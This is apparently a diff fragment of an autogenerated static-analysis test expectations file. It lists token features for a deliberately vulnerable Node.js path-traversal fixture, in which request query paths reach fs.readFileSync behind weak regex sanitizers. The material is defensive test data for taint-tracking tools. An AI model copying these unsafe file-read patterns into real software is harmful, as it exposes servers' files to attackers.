fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:159:30:159:33 | join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:159:30:159:33 | join | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:159:35:159:37 | "/" | CalleeFlexibleAccessPath | concatted2.join | | autogenerated/TaintedPath/TaintedPath.js:159:35:159:37 | "/" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:159:35:159:37 | "/" | calleeImports | url | @@ -5945,6 +63517,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:159:35:159:37 | "/" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:159:35:159:37 | "/" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:159:35:159:37 | "/" | receiverName | concatted2 | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:4 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:4 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:17 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:17 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:30 | exceptional return of fs.read ... .pop()) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:30 | exceptional return of fs.read ... .pop()) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:30 | exceptional return of fs.read ... .pop()) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:30 | exceptional return of fs.read ... .pop()) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:30 | exceptional return of fs.read ... .pop()) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:30 | fs.read ... .pop()) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:30 | fs.read ... .pop()) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:30 | fs.read ... .pop()) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:30 | fs.read ... .pop()) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:161:3:161:30 | fs.read ... .pop()) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:161:6:161:17 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:6:161:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:6:161:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:161:6:161:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:161:6:161:17 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:23 | split | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:23 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:23 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:23 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:23 | split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:27 | split.pop | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:27 | split.pop | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:27 | split.pop | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:27 | split.pop | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:27 | split.pop | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:29 | exceptional return of split.pop() | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:29 | exceptional return of split.pop() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:29 | exceptional return of split.pop() | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:29 | exceptional return of split.pop() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:161:19:161:29 | exceptional return of split.pop() | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:161:19:161:29 | split.pop() | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:161:19:161:29 | split.pop() | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:161:19:161:29 | split.pop() | calleeImports | fs | @@ -5954,6 +63566,62 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:161:19:161:29 | split.pop() | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:161:19:161:29 | split.pop() | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:161:19:161:29 | split.pop() | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:161:25:161:27 | pop | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:25:161:27 | pop | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:161:25:161:27 | pop | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:161:25:161:27 | pop | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:161:25:161:27 | pop | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:5:165:10 | server | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:5:165:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:5:165:10 | server | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:5:196:2 | server ... ute)\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:5:196:2 | server ... ute)\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:5:196:2 | server ... ute)\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:14:165:17 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:14:165:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:14:165:17 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:14:165:30 | http.createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:14:165:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:14:165:30 | http.createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:14:196:2 | exceptional return of http.cr ... ute)\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:14:196:2 | exceptional return of http.cr ... ute)\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:14:196:2 | exceptional return of http.cr ... ute)\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:14:196:2 | http.cr ... ute)\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:14:196:2 | http.cr ... ute)\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:14:196:2 | http.cr ... ute)\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:19:165:30 | createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:19:165:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:19:165:30 | createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | this | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:165:32:165:31 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | functio ... lute)\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | functio ... lute)\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | functio ... lute)\\n} | calleeImports | http | @@ -5961,6 +63629,86 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | functio ... lute)\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | functio ... lute)\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | functio ... lute)\\n} | receiverName | http | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:165:32:196:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:41:165:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:41:165:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:41:165:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:41:165:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:41:165:43 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:165:41:165:43 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:165:41:165:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:165:41:165:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:165:41:165:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:41:165:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:46:165:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:46:165:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:46:165:48 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:165:46:165:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:165:46:165:48 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace 